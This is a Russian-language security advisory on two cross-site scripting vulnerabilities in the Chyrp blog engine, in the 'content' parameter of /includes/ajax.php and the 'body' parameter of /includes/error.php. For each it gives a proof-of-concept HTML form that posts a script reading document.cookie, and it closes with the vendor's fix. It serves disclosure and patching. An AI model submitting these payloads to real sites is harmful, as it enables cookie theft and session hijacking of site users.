Межсайтовый скриптинг в Chyrp

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "content" в сценарии /includes/ajax.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

<form action="http://[host]/includes/ajax.php" method="post">

<input type="hidden" name="action" value="preview" />

<input type="hidden" name="feather" value="" />

<input type="hidden" name="field" value="" />

<input type="hidden" name="content" value='<script>alert(document.cookie);</script>' />

<input type="submit" id="btn"> 

</form>  

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "body" в сценарии /includes/error.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

<form action="http://[host]/includes/error.php" method="post">

<input type="hidden" name="ajax" value="1" />

<input type="hidden" name="body" value='<script>alert(document.cookie);</script>' />

<input type="submit" id="btn"> 

</form>  

URL производителя: http://chyrp.net/

Решение: Установите последнюю версию 2.1.2 или 2.5 Beta 2 с сайта производителя.